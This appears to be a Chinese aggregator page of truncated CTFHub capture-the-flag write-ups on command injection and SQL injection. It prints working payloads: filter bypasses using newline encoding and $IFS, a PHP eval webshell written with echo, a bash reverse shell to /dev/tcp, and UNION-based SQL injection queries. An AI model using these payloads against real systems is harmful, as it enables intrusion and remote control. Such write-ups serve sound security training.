首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
ctfhub技能树—RCE—综合过滤练习
】的更多相关文章
ctfhub技能树—RCE—综合过滤练习
打开靶机 查看页面信息 查看源码可以发现这一次过滤了很多东西,查看当前目录信息 查询到%0a为换行符,可以利用这个url编码进行命令注入,开始尝试 http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als# 查看flag_is_here文件夹内文件信息 challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<fla…
ctfhub技能树—RCE—过滤目录分隔符,过滤运算符
过滤目录分隔符 打开靶机 查看页面信息 查询当前目录下文件结构 进入flag_is_here目录 127.0.0.1;cd flag_is_here 127.0.0.1||ls 执行之后发现还是在当前目录 使用如下命令进行查询 127.0.0.1;cd flag_is_here;ls 查看文件信息 127.0.0.1;cd flag_is_here;cat flag_1633660217512.php 成功拿到flag 过滤运算符 查看文件结构 ;ls 查看文件信息 ;cat flag_4603…
ctfhub技能树—RCE—过滤空格
打开靶机 查看页面信息 开始尝试注入 127.0.0.1 || ls 尝试绕过 127.0.0.1||ls 使用cat命令查看flag 127.0.0.11||cat<flag_10872536812766.php 拿到flag 绕过空格过滤方法很多,详情请自行百度搜索…
ctfhub技能树—RCE—过滤cat
打开靶机 查看页面信息 构造payload 127.0.0.1 || ls 题目提示过滤了cat,但我还是想试试 果然不行 网页访问没有结果,应该和上题一样被注释了,使用和同样的方法进行解题 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…
ctfhub技能树—sql注入—过滤空格
手注 查询数据库 -1/**/union/**/select/**/database(),2 查询表名 -1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli' 查询字段名 -1/**/union/**/select/**/group_concat(column_name),2/**/from/**/informa…
ctfhub技能树—RCE—命令注入
打开靶机 查看页面信息 输入127.0.0.1进行测试 构造payload 127.0.0.1&ls 查看文件内容信息 127.0.0.1 & cat 179852221619745.php 没有反应...... 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…
ctfhub 过滤运算符 综合过滤练习 读取源代码 远程包含 eval执行 文件包含 php://input
过滤运算符 过滤了\和&那么尝试; 成功那么将flag cat出来 127.0.0.1;cat flag_27249269530391.php 得到flag 综合过滤练习 这次过滤有点多过滤了&;空格flag,cat,ctfhub 但是没有过滤%0a,%0d,用 I F S 取 代 空 格 , 用 {IFS}取代空格,用 IFS取代空格,用*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空 回显有一个flag_is_here文件夹 payload:http://cha…
ctfhub技能树—彩蛋
彩蛋题建议大家首先自己动手去找一找 做 好 准 备 后 再 看 下 文 ! 1.首页 使用域名查询工具查询子域名 2.公众号 此题关注ctfhub公众号即可拿到,不过多赘述. 3.题目入口 随便开启一个题目,抓包 在url中间添加换行或空格,再放包,即可拿到flag 4.Writeup 在Writeup里搜索egg即可拿到flag 5.工具 在工具里搜索egg,即可拿到flag flag就在链接里 6.赛事 一个套路 7.真题 8.投稿提交 这道题比较有意思,flag分别在不…
CTFHub web技能树 RCE
一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来... 试了几下反弹shell,没成功...于是直接用echo了一个一句话进去 .php 注意这里$转义了一下,不转的话会被识别成变量.. 之后拿我40米长的菜刀 php用了注释..和想的差不多 这题竟然花了那么久 我是这样反弹shell.. bash -i >& /dev/tcp/ip/port 过滤空格的 127.0.0.1&…
【CTF】CTFHub 技能树 彩蛋 writeup
碎碎念 CTFHub:https://www.ctfhub.com/ 笔者入门CTF时时刚开始刷的是bugku的旧平台,后来才有了CTFHub. 感觉不论是网页UI设计,还是题目质量,赛事跟踪,工具软件都做得很不错. 而且因为独到的金币制度的确让人有一种想去刷题赚金币的感觉. 个人还是非常喜欢这个平台的. 某天随便瞅瞅CTFHub的工具页面,一页页地翻下去看看有没有什么需要的黑科技. 翻到最后一页时候,突然发现了个egg!! 然后注意到技能树的彩蛋部分. wow不错不错,有意思!! 虽然都不是很…